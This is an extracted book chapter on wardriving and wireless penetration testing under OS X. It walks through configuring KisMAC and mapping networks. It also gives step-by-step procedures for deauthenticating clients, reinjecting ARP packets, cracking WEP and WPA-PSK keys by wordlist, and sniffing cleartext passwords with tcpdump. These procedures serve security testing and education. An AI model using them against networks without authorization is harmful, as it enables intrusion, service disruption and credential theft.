WarDriving and Wireless Penetration Testing with OS X

WarDriving andWireless PenetrationTesting with OS X

Solutions in this chapter:

■ WarDriving with Kismac

■ Penetration Testing with OS X

■ Other OS X Tools for WarDriving and WLANTesting

Chapter 6

153

� Summary

� Solutions Fast Track

� Frequently Asked Questions

410_WD2e_06.qxd 10/16/06 10:08 AM 53

IntroductionWith operating system (OS) X, WarDriving and Wireless Local Area Network(WLAN) penetration testing have excellent wireless support and several tools tomake these tasks easy.

The first part of this chapter describes the steps necessary to configure and uti-lize the KisMAC WLAN discovery tool in order to successfully WarDrive. (For addi-tional information regarding WarDriving, see Chapter 1.) The second part of thischapter describes how to use the information obtained during a WarDrive, and goeson to detail how a penetration tester can further utilize KisMAC to successfully pen-etrate a customer’s wireless network.

WarDriving with KisMACKisMAC is the best WarDriving and WLAN discovery and penetration testing toolavailable on any platform, and is available for free at http://kismac.binaervarianz.de/.Most WarDriving applications provide the capability to discover networks in eitheractive mode or passive mode; KisMAC provides both. On other platforms, WarDrivingtools such as Kismet for Linux and NetStumbler for Windows only provide thecapability to discover WLANs. KisMAC is unique because it also includes the func-tionality that a penetration tester needs to attack and compromise found networks.

Table 6.1 Prominent Wireless Discovery Tools and Capabilities

Tool Platform Scan Type Attack Capability

NetStumbler Windows Active NoKismet Linux Passive NoKisMAC OS X Active/Passive Yes

Starting KisMAC and Initial ConfigurationOnce KisMAC has been downloaded and installed, it is relatively easy-to-use.Thefirst thing you need to do is load KisMAC, which is done by clicking on theKisMAC icon (see Figure 6.1). (Habitual WarDrivers will want to add KisMAC totheir toolbar.)

www.syngress.com

154 Chapter 6 • WarDriving and Wireless Penetration Testing with OS X

410_WD2e_06.qxd 10/16/06 10:08 AM Page 154

Figure 6.1 KisMAC

Next, you need to configure your KisMAC preferences and understand theKisMAC interface.

Configuring the KisMAC PreferencesThe KisMAC interface is very straightforward; however, because it is so robust, thereare many different configuration options available.The first thing you need to do isopen the “Preferences” window from the KisMAC menu by pressing KisMAC ⎜⎜Preferences (see Figure 6.2).This section covers six of the eight available preferences:

■ Scanning

■ Filter

■ Sounds

■ Driver

■ Traffic

■ KisMAC

www.syngress.com

WarDriving and Wireless Penetration Testing with OS X • Chapter 6 155

410_WD2e_06.qxd 10/16/06 10:08 AM Page 155

Figure 6.2 KisMAC Preferences

Scanning OptionsThere are two scanning options available that relate to the actions KisMAC takeswhen closing:

■ Do not ask to save data on exit

■ Terminate KisMAC on close of main window

By default, you will be prompted to save your data file unless you check the “Donot ask to save data on exit” option when closing KisMAC. It is a good idea to leavethis option unchecked, thereby requiring you to manually save your data beforeclosing KisMAC so that you do not accidentally lose data.The second option con-trols whether or not KisMAC terminates when you close the main window, whichis a matter of personal preference. If this box is unchecked, KisMAC will be closedbut remain loaded, and will continue to display in the toolbar.

Filter OptionsThe Filter options allow you to designate specific MAC addresses that you do notwant included in your results (see Figure 6.3). Enter a MAC address and press addto enable this functionality.This is especially useful for removing wireless networks(e.g., your home network or other boxes you are using for an attack) from yourresults.Additionally, if performing a penetration test, you will probably only wanttraffic from your target in your data sets.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 156

Figure 6.3 Filter Options

Sound PreferencesUnlike its Linux counterpart, Kismet, which requires a third-party application suchas Festival, KisMAC has built-in functionality for identifying the Service SetIdentifier (SSID) of wireless networks (see Figure 6.4).

Figure 6.4 Kismet Sound Preferences

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 157

Easy-to-use drop-down menus (see Figure 6.5) allow you to assign differentsound effects to be played when a Wired Equivalent Privacy (WEP) or WiFiProtected Access (WPA) network is found.Additionally, specific sound effects can beplayed when a certain number of packets have been captured, and different voicescan speak the network name or SSID as networks are discovered.

Figure 6.5 Easy-to-Use Drop-Down Menus Allow You to Configure SoundEffects

Notes from the Underground

Choosing a WLAN CardKisMAC has built-in support for a wide range of WLAN cards. When choosing acard you must determine what your goals are; KisMAC has support for bothactive and passive scanning. Active scanning relies on the broadcast beacon todiscover access points; the built-in Airport Extreme card on most iBooks andPowerbooks works in active mode only.

Passive scanning does not rely on the broadcast beacon. In order to pas-sively scan for wireless networks, you must have a card capable of entering mon-itor mode (rfmon). Once a card has been placed in monitor mode, it can sniff all

www.syngress.com


Continued

410_WD2e_06.qxd 10/16/06 10:08 AM Page 158

traffic within range of that card (or its attached antenna) and discover any wire-less networks, including those that do not broadcast from the beacon.

Kismet supports Airport or Airport Extreme cards in active mode. Atheros,Prism2, Hermes, and Prism GT chipsets support Airport and Cisco PersonalComputer Memory Card International Association (PCMCIA) cards in passivemode. Additionally, Universal Serial Bus (USB) devices based on the Prism2chipset support passive mode. Figure 6.6 displays the drop-down menu of avail-able chipsets. Table 6.2 indicates some of the common cards and chipsets thatwork with KisMAC and the mode they work in.

Table 6.2 Cards That Work with KisMAC

Manufacturer Card Chipset Mode

Apple Airport Hermes PassiveApple Airport Express Broadcom ActiveCisco Aironet LMC-352 Cisco PassiveProxim Orinoco Gold Hermes PassiveEngenius Senao 2511CD Prism 2 Passive

Plus EXT2Linksys WPC11 Prism 2 PassiveLinksys WUSB54G Prism2 Passive

NOTE

If your adapter is not listed in Table 6.2, go to http://linux-wlan.org/docs/wlan_adapters.html.tgz for a more complete list ofcards and their respective chipsets.

12-in. Powerbooks and all iBook models do not have PCMCIA slots,and therefore require a USB WiFi Adapter (e.g., Linksys WUSB54G or anoriginal Airport) in order to work in passive mode. Unfortunately, thereare currently no USB WiFi adapters with external antenna connectors.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 159

Figure 6.6 KisMAC-supported Chipsets

TrafficKisMAC also affords WarDrivers the ability to view the signal strength, number ofpackets transferred, and number of bytes transferred on detected networks. Networkscan be displayed using the SSID or MAC address (denoted in the “Options” panel(see Figure 6.7) by Basic Service Set Identifier (BSSID).The average signal can becalculated based on the amount of traffic seen in the last 1–300 seconds, and shouldbe adjusted depending on the degree of accuracy needed.

Figure 6.7 Traffic Preferences

KisMAC PreferencesKisMAC is a built-in option that allows you to easily share your WarDrive data withother KisMAC users. In order to use KisMAC, you need a KisMAC account, whichcan be created from the KisMAC “Preferences” window.

Press the Sign up now. button to open the default browser (http://binaervar-ianz.de/register.php) and create your KisMAC account (see Figure 6.8). Figure 6.9displays the KisMAC registration window.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 160

Figure 6.8 The KisMAC Preferences

Figure 6.9 KisMAC Registration Window

To send your data to the KisMAC server, when you have finished WarDrivingselect the Export option from the File menu by pressing File ? Export ? Datato KisMAC Server.

In addition to transmitting your results to the KisMAC server, a KisMACaccount allows you to search the existing KisMAC database.

NOTE

It is a good idea to disable KisMAC prior to doing work for a customer,so that their data is not sent to a public server.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 161

Mapping WarDrives with KisMACIn general, KisMAC is a very intuitive and easy-to-use tool; however, there is oneexception: mapping. Mapping WarDrives with KisMAC can be a frustrating experi-ence at first.This section details the steps required to successfully import a map touse with KisMAC.

Importing a MapThe first step required in mapping WarDrives with KisMAC is importing a map.This differs from many other WLAN discovery applications (e.g., Kismet for Linuxor NetStumbler for Windows) where maps are often generated at the completion ofthe WarDrive.

KisMAC requires the latitude and longitude of the center area of your drive inorder to import a map.These coordinates can be input manually, but it is easier toconnect your GPS first and get a signal lock.

Using a GPSMost GPS devices capable of National Marine Electronics Association (NMEA)output, work with KisMAC. Many of these devices are only available with serialcables. In most cases, you will need to purchase a serial-to-USB adapter (approxi-mately $25) in order to connect your GPS to your Mac. Most of these adapterscome with drivers for OS X; thus, make sure that the one you purchase includesthese drivers.Also, depending on your GPS model, you may be able to use a USBGPS cable and eliminate the need for a USB-to-serial adapter.The GPS Store sellsthese cables at http://www.thegpsstore.com/detail.asp?product_id=GL0997.

After you have connected your GPS, open the KisMAC Preferences and selectthe GPS options (see Figure 6.10). Select /dev./tty.usbserial0 from the drop-downmenu if it wasn’t automatically selected.

Ensure that use GPS coordinates and use all points are selected and that theGPSd is listening on localhost port 2947. Your GPS is now configured and ready togo.To install GPS, download GPSd for OS X from http://gpsd.berlios.de/. Instructionsfor compiling and using GPSd can be found at (http://kismac.binaervarianz.de/wiki/wiki.php/KisMAC/WiFiHacksCompileGPSd).

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 162

Figure 6.10 KisMAC GPS Preferences

Another option is using a Bluetooth GPS; however, according to the KisMACWeb site there is a problem with the Bluetooth stack in OS X; you still have to useGPSd with these devices.

Ready to ImportNow that your GPS device is connected, you are ready to import a map.To import amap, select File | Import | Map from | Server (see Figure 6.7).

Figure 6.11 Preparing to Import a Map

This opens the “Download Map” dialog box (see Figure 6.12).Your current GPScoordinates are automatically imported into this box. Choose the server and type ofmap you want to import.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 163

Figure 6.12 Choosing the Map Server and Type of Map

There are several map servers available as well as different types of maps (i.e., reg-ular or satellite), as shown in Figure 6.13.

Figure 6.13 Available Map Servers and Types of Maps

After importing your map, save it by pressing File | Save Map so that ifKisMAC crashes during your WarDrive, you will have a local copy. KisMAC is anoutstanding tool that is prone to occasionally crashing, which can happen when alarge number of networks are found simultaneously.Additionally, many of the attacksincluded with KisMAC require significant memory and processor power. Even moreunfortunate is that when KisMAC crashes, the system usually stops responding, thusrequiring a complete shutdown and restart of the system to resume operations.

Waypoint 1 is set to your current position. Before beginning your WarDrive, youneed to set WayPoint 2. From the OS X toolbar press Map | Set Waypoint 2 andplace the second WayPoint at your destination or any other place on the map if youare unsure of your destination.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 164

Next, set your “Map” preferences by pressing KisMAC | Preferences (seeFigure 6.14), which is where you set the preferences for the color scheme used onyour map and the display quality and sensitivity levels some colors denote.

Figure 6.14 KisMAC Map Preferences

After all of your options are set, you are ready to WarDrive.As access points arediscovered they are plotted on the map. Pressing the Show Map button displaysyour map and your access points are plotted in real time as you drive.A typical mapgenerated by KisMAC using a satellite image, is shown in Figure 6.15.

Figure 6.15 Typical KisMAC Satellite Map

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 165

KisMAC includes the ability to manipulate your map as well.

Notes from the Underground…

Disabling the Annoying “Sleep” FunctionOne of the more irritating features of OS X for WarDrivers is the inability to dis-able the “sleep” function. In many states, driving with your laptop open is illegal.A laptop that is asleep and not collecting access points poses a difficult problemfor OS X WarDrivers. Luckily, a kernel extension is available that allows you totemporarily disable the OS X sleep function.

Insomnia (http://binaervarianz.de/projekte/programmieren/meltmac/) isa kernel extension used to disable sleep in OS X. After downloading Insomnia,unpack the kernel extension and issue the following command:

sudo chown –R root:wheel Insomnia.kext

This correctly sets the permissions on the kernel extension. This step isrequired immediately after download and before using Insomnia. The kernelextension has to be loaded each time you want to disable the sleep function:

sudo kextload Insomnia.kext

Now when you close the lid on your Powerbook or iBook it will not go tosleep. When you are finished WarDriving and want to re-enable the “sleep” func-tion, the kernel extension must be unloaded.

sudo kextunload Insomnia.kext

Your laptop is back to normal operation. It should be pointed out that Applelaptops generate a lot of heat, so it’s not a good idea to leave this kernel exten-sion loaded all the time; just on the specific occasions when you need it.

WarDriving with KisMACNow that your KisMAC preferences are set, the correct driver is chosen, and yourmap is imported, it is time to go WarDriving.The KisMAC interface is easy to navi-gate and has some advanced functionality that combines the best features from otherWarDriving applications, including many commercial applications.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 166

Using the KisMAC InterfaceThe KisMAC interface (see Figure 6.16) is straightforward and easy to understand.The main window displays all wireless networks that KisMAC has found, and can besorted by number (in the order it was found); SSID; BSSID MAC address; the typeof encryption used; the current, average, or maximum signal strength; the number ofpackets transmitted; the size of the data stream (in kilobytes or megabytes); and thetime that the access point was last in range (Last Seen).

Figure 6.16 KisMAC Graphical User Interface

After you have configured the options for your WarDrive, press the Start Scanbutton (located in the bottom right corner of the interface) to begin locating accesspoints.Additionally, there are four buttons across the bottom toolbar that allow youto see specific information about your current drive.

The KisMAC Window View ButtonsKisMAC allows you to see specific information about your current WarDrive byselecting one of four buttons that are located on the bottom toolbar (see Figure 6.17).

The Show Networks button is the default setting.To return to the defaultsetting after selecting other options, press this button to see all of the networks thathave been discovered.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 167

Figure 6.17 KisMAC Window View Buttons

The Show Networks button is the default setting.To return to the default set-ting after selecting other options, press this button to see all of the networks thathave been discovered.

Selecting the Show Traffic button brings up a signal graph of the net-works that were discovered during your WarDrive. By default, this view shows asignal strength graph (see Figure 6.18). Each access point is denoted by a uniquecolor, and a key showing which network is assigned to each color is in the upperright-hand corner.The taller lines in the graph indicate a stronger signal.

Figure 6.18 “Show Traffic” View

There are two drop-down menus in the upper left-hand corner. One is theinterval (15 seconds by default) that is displayed, and the other is a menu that allowsyou to change the type of information that can be viewed using the “Show Traffic”view. In addition to the signal strength, you can also display the packets per secondthat are traversing the wireless network, or the total number of bytes that have beensent and received by the access points.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM 8

The Show Map button allows you to view a live map of your currentWarDrive. (For more information on mapping your WarDrive, see “Mapping YourWarDrive” earlier in this chapter.)

The last view is accessed with the Show Details button .This view allowsyou to obtain a significant amount of information about a specific access point (seeFigure 6.19).

Figure 6.19 “Show Details” View

The information listed in the default view is on the left side of the interface, andthe information about clients that are attached to the network is on the right-handside of the interface.The information available in this view is essential to a penetra-tion tester, and is discussed in detail in the “Penetration Testing with OS X” sectionlater in this chapter.

Additional View Options with KisMACIn addition to the View buttons, KisMAC provides you with the ability to obtainadditional information about specific networks while in “Show Networks” view.Using the OS X menu bar, press Windows | Show Hierarchy (see Figure 6.20).

With “Show Hierarchy” displayed (see Figure 6.21), you can gather more infor-mation about specific networks; networks utilizing different types of encryption; orall networks transmitting on a specific channel.This information is vital during apenetration test.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 169

Figure 6.20 OS X Menu Hierarchy

Figure 6.21 “KisMAC Hierarchy” View

Penetration Testing with OS XIn addition to being used as a WarDriving application, KisMAC is the best toolavailable for wireless network penetration testing. KisMAC has built-in functionalityto perform many of the most common WLAN attacks, using an easy “point-and-click” interface.Additionally, KisMAC can import packet capture dumps from otherprograms to perform many offline attacks against wireless networks.This sectionwalks through many of these attacks on the target network.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 170

The following is a working example:You’re contracted to perform a penetrationtest for a company and need to correctly identify their wireless network. Using theinformation gathered during your WarDrive of the area surrounding your target, yousuccessfully identified the target network based on the signal strength, map data, andnaming convention used on the access point.To successfully penetrate this network,you have to determine what type of encryption is being used.

Attacking WLAN Encryption with KisMACThere are several different types of encryption that wireless networks can employ.The most commonly used encryption schemes are WEP and WPA, although thereare other, more advanced schemes available. Looking at the KisMAC display, you seethat the access point with the SSID Our_Target is a WEP-encrypted network.

Attacking WEP with KisMACSince you have determined that WEP is being used on your target wireless network,you now have to decide how you want to crack the key. KisMAC has three primarymethods of WEP cracking built in:

■ Wordlist attacks

■ Weak scheduling attacks

■ Bruteforce attacks

To use one of these attacks, you have to generate enough initialization vectors(IVs) for the attack to work.The easiest way to do this is by reinjecting traffic, whichis usually accomplished by capturing an Address Resolution Protocol (ARP) packet,spoofing the sender, and sending it back to the access point.This generates a largeamount of traffic that can then be captured and decoded. Unfortunately, you can’talways capture an ARP packet under normal circumstances; however, when a clientauthenticates to the access point, an ARP packet is usually generated. Because ofthis, if you can deauthenticate the clients that are on the network and cause them toreassociate, you may get your ARP packet.

Looking at the detailed view of Our_Target, you can see that there are severalclients connected to it. Before continuing with the attack, you need to determinethe role that KisMAC will play.Two hosts are required to successfully crack theWEP key: one host is used to inject traffic, and the other host is used to capture thetraffic (specifically the IVs). In this case, you will use KisMAC to inject and will havea second host to capture the traffic. While KisMAC and OS X are very powerfulattack tools, the actual cracking is often best performed on a Linux host utilizing

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 171

tools such as Aircrack (www.cr0.net:8040/code/network),because KisMAC does notinclude support for many of the newer WEP attacks, such as chopping. Hopefully,these attacks will be included with future releases of KisMAC.

Deauthenticating clients with KisMAC is simple; however, before you can begindeauthenticating, you must lock KisMAC to the specific channel that your targetnetwork is using. From the top menu press KisMAC ? Preferences ? DriverPreferences. Highlight the driver you are using and deselect all channels other thanthe one that the target is using.Also, ensure that use as primary device is checkedunder the “Injection” menu. Close the “Preferences,” highlight the access point youwant to deauthenticate clients from, and press Network ? Deauthenticate. IfKisMAC is successful in its attempt to deauthenticate, the dialog changes to note theBSSID of the access point it is deauthenticating (see Figure 22). During the time thedeauthentication is occurring, clients cannot use the wireless network.

Figure 6.22 Deauthenticaion

During deauthentication, the number of Inj. Packets should increase (see Figure6.22).After several of these have been captured, stop the deauthentication.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 172

ReinjectionOnce several potentially reinjectable packets have been captured (noted in the“Show Details” view of KisMAC), it is time to attempt reinjection. Press Network| Reinject Packets (see Figure 6.23).

Figure 6.23 Preparing to Reinject Packets

This opens a dialog box (see Figure 6.24) indicating that KisMAC is testing eachpacket to determine if it can be successfully reinjected into the network.

Figure 6.24 Testing the Packets

Once KisMAC finds a suitable packet, the dialog box closes and KisMAC beginsinjection.This can be verified by viewing the “Network” options (see Figure 6.25).

Now the traffic has to be captured with a second card (usually on a secondmachine) in order to capture enough IVs to attempt to crack the key. KisMAC canbe used to perform weak scheduling attacks after enough weak IVs have been cap-tured; however, it is probably more efficient to use KisMAC to inject packets, and touse a tool such as Aircrack to perform the actual WEP crack.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 173

Figure 6.25 Reinjection

Attacking WPA with KisMACUnlike WEP, which requires a large amount of traffic be generated in order to crackthe key, cracking WPA only requires that you capture the four-way ExtensibleAuthentication Protocol Over Local Area Network (EAPOL) handshake at authenti-cation.Also, unlike cracking WEP, the WPA attack is an offline dictionary attack,which means that when you use KisMAC to crack a WPA pre-shared key (orpassphrase), you only need to capture a small amount of traffic; the actual attack canbe carried out later, even when you are out of range of the access point.

WPA is only vulnerable when a short passphrase is used. Even then, it must be adictionary word or one that is in your wordlist.An extensive wordlist with manycombinations of letters, numbers, and special characters can help increase the odds ofsuccessfully cracking WPA.

To attempt a dictionary attack against KisMAC, you may need to deauthenticateclients (detailed in the “Attacking WEP with KisMAC” section). However, whenattempting dictionary attacks against WPA, everything can be done from one host,which will cause the client to disassociate from the network and force them toreconnect.This requires the four-way EAPOL handshake to be transmitted again.

Once you have captured an association between a client and the WPA network,press Network | Crack | Wordlist Attack | Wordlist against WPA-PSK Key.You will be prompted for the location of the wordlist or dictionary file that youwant to use.After you have selected your dictionary file, KisMAC begins testingeach word in that file against the WPA Pre-Shared Key (PSK)(see Figure 6.26).

When KisMAC has successfully determined the key, it is displayed in the “ShowDetails” view.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 174

Figure 6.26 WPA Cracking

Other AttacksKisMAC also offers the ability to perform attacks against other forms of encryptionand authentication. Because these other methods have known vulnerabilities and arerarely used by clients, they are not discussed in detail, but are included for completeness.

Bruteforce Attacks Against 40-bit WEP KisMAC includes functionality to perform Bruteforce attacks against 40-bit WEPkeys.There are four ways KisMAC can accomplish this:

■ All possible characters

■ Alphanumeric characters only

■ Lowercase letters only

■ Newshams 21-bit attack

Each of these attacks is very effective, but also very time- and processor-intensive.

Wordlist AttacksKisMAC provides the functionality to perform many types of wordlist attacks inaddition to WPA attacks. Cisco developed the Lightweight Extensible AuthenticationProtocol (LEAP) to help organizations concerned about vulnerabilities in WEP.Unfortunately, LEAP is also vulnerable to wordlist attacks similar to WPA. KisMACincludes the functionality to perform wordlist attacks against LEAP by following thesame procedure used when cracking WPA. Select the against LEAP Key button tobegin the attack.

Additionally, wordlist attacks can be launched against 40- and 104-bit Apple keysor 104-bit Message Digest 5 (MD5) keys in the same manner.As with any dictio-

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 175

nary attack, these attacks are only effective if a comprehensive dictionary file is usedwhen performing the attack (see www.securitytribe.com/~roamer/words.txt).

Other OS X Tools for WarDriving and WLAN TestingKisMAC has been the focus of the bulk of this chapter; however, there are severalother wireless tools that can keep an OS X hacker busy for hours.

EtherPEG (www.etherpeg.org) is a program that captures and displays all of theJoint Photographic Experts Group ( JPEG) and Graphic Interchange Format (GIF)images that are being transferred across the network (including WLANs). In order touse EtherPEG against a wireless network, encryption must not be in use, or youmust be connected to the network.

iStumbler (http://istumbler.net/), as shown in figure 6.27, is an active WLAN dis-covery tool for OS X that works with the built-in Airport Express card. In additionto WLAN discovery, iStumbler can also detect Bluetooth devices using the built-inBluetooth adapter.There is no setup required with iStumbler; simply unpack thearchive and press the iStumbler icon to begin.

Figure 6.27 iStumbler

With the release of OS X Tiger, there have been several dashboard widgetsdeveloped and released that perform active scanning with the Airport and AirportExpress cards (e.g.,Air Traffic Control) (see Figure 6.28).

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 176

Figure 6.28 Air Traffic Control

Dashboard widgets are updated regularly and new ones are released nearly everyday. Check out the latest wireless discovery widgets at www.apple.com/downloads/dash-board and select the “Networking and Security” option from the “WidgetNavigation” menu.

Tcpdump is a network traffic analyzer (sniffer) that ships with OS X.Tcpdumpcan be configured to listen on a wireless interface to capture traffic coming acrossthe WLAN with the following command:

crapple:~ roamer$ sudo tcpdump -i en1

Tcpdump can be used to capture usernames and passwords that are sent in cleartext (e-mail, Network Basic Input/Output System [NetBIOS], and so forth).

And finally, another useful packet sniffer is Ethereal (www.ethereal.org).Information on installing and using Ethereal is presented in Chapter X.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 177

SummaryWhen people think of WarDriving and attacking wireless networks, Linux is usuallythe first OS that comes to mind. While there are fantastic tools available for Linux,there are also several outstanding tools for the wireless hacker available for OS X.

KisMAC is the most popular WarDriving application for OS X. Because it offersthe option of both active and passive scanning and a large number of supportedchipsets, it is perfect for WarDriving.Add to that the ease of setup and configurationand KisMAC stands out as one of, if not the top WarDriving application available.

In addition to its power as a WarDriving application, KisMAC is also a verypowerful tool for WLAN penetration testing. It provides many of the most popularattacks (the new chopping attacks against WEP being the only omission) and offerspenetration testers easy, point-and-click options for some attacks that are traditionallymore difficult on other OSes (e.g., deauthentication and traffic reinjection).Thetools available for these type of attacks on other OSes are either difficult to use orare so restricted that working with KisMAC’s point-and-click attack method is awelcome change.

While KisMAC is outstanding, it isn’t the only WLAN discovery tool availablefor OS X. iStumbler has a far smaller feature set than KisMAC, but is extremely easyto use and also includes Bluetooth functionality.There are also several dashboardwidgets that can be downloaded from the Apple Web site that work in conjunctionwith the Airport and Airport Express cards to perform active WLAN discovery.

Wireless hackers are going to be hard pressed to find an OS other than OS Xthat combines power, functionality, and ease of use with a more robust set of avail-able free tools.

Solutions Fast Track

WarDriving with Kismac

� Kismac is one of the most versatile tools available for WarDriving

� Kismac can operate in both active and passive modes.

� Kismac has built in capability to allow WarDrivers to map their drives

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 178

Penetration Testing with OS X

� Kismac provides the capability to perform many wireless penetration testingtasks

� Kismac has the ability to deauthenticate clients built in

� Kismac contains routines for injecting traffic into a wireless network

� Kismac has built in tools to crack WEP

� Kismac has built in tools to crack WPA Passphrases

Other OS X Tools for WarDriving and WLAN Testing

� iStumbler is a tool that can detect not only 802.11 b/g wireless networks,but also Bluetooth devices

� As of OS X 10.4 Tiger, there are many dashboard widgets available that candetect wireless networks.

� A packet analyzer, or sniffer, such as TCPDump or Ethereal is a valuabletool for a wireless penetration tester.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 179

Q. Why do some attacks require weak IVs and some only require unique IVs?

A. The traditional attacks against WEP were originally detailed by Scott Fluhrer,Itsik Mantin, and Adi Shamir in their paper,“Weaknesses in the Key SchedulingAlgorithm of RC4.” (www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf ).Theseattacks are known as FMS attacks.This paper details that a small subset of thetotal IVs were weak and, if enough were collected, could be used to determinethe WEP key.The problem with this method was that it was very time con-suming due to the number of packets required to capture enough weak IVs tocrack the key.

In February 2002, H1kari detailed a new method for attacking WEP(www.dachb0den.com/projects/bsd-airtools/wepexp.txt), dubbed “chopping,”where weak IVs were no longer required. Instead, approximately 500,000 uniqueIVs needed to be gathered in order to successfully crack the WEP key.This, cou-pled with the ability to reinject ARP packets into the network, greatly reducedthe amount of time required to crack WEP. Using the FMS method of WEPcracking, it could take weeks or months to successfully crack the WEP key.Thechopping method has reduced this to a matter of hours (and sometimes less).This attack took a theoretical threat and turned it into a significant vulnerabilityfor wireless networks utilizing WEP.More information on WEP cracking and the tools available for cracking can befound in Chris Hurley’s paper,“Aircrack and WEPlab: Should You Believe theHype,” available for download at www.securityhorizon.com/journal/fall2004.pdf.

Q. I remember a tool call MacStumbler. Why isn’t it mentioned in this chapter?

A. MacStumbler (www.macstumbler.com) was one of the first WLAN discoverytools available for OS X. Unfortunately, it only operated in active mode, anddevelopment and maintenance ceased in July 2003. Many tools, such asKisMAC, have taken WLAN discovery for OS X to the next level and essentially

www.syngress.com


Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book,are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. Tohave your questions about this chapter answered by the author, browse towww.syngress.com/solutions and click on the “Ask the Author” form.

410_WD2e_06.qxd 10/16/06 10:08 AM Page 180

rendered MacStumbler obsolete. However, it is still available for download and iscompatible with both Airport Express cards and OS X Tiger.

Q. Can KisMAC logs be imported into other applications?

A. Yes.You can export KisMAC to NetStumbler and MacStumbler readable formats.

Q. Why would I want to export to NetStumbler format?

A. There are a couple of good reasons to export to NetStumbler format. First, itallows you to map your drives after completion using the assorted mapping toolsavailable. Second, NetStumbler has excellent support for exporting WarDrivedata to different formats. Once you have imported your KisMAC data intoNetStumbler, you have the ability to export to any of these formats.

www.syngress.com


410_WD2e_06.qxd 10/16/06 10:08 AM Page 181

410_WD2e_06.qxd 10/16/06 10:08 AM Page 182

WarDriving and Wireless Penetration Testing with OS X

Documents

Transcript of WarDriving and Wireless Penetration Testing with OS X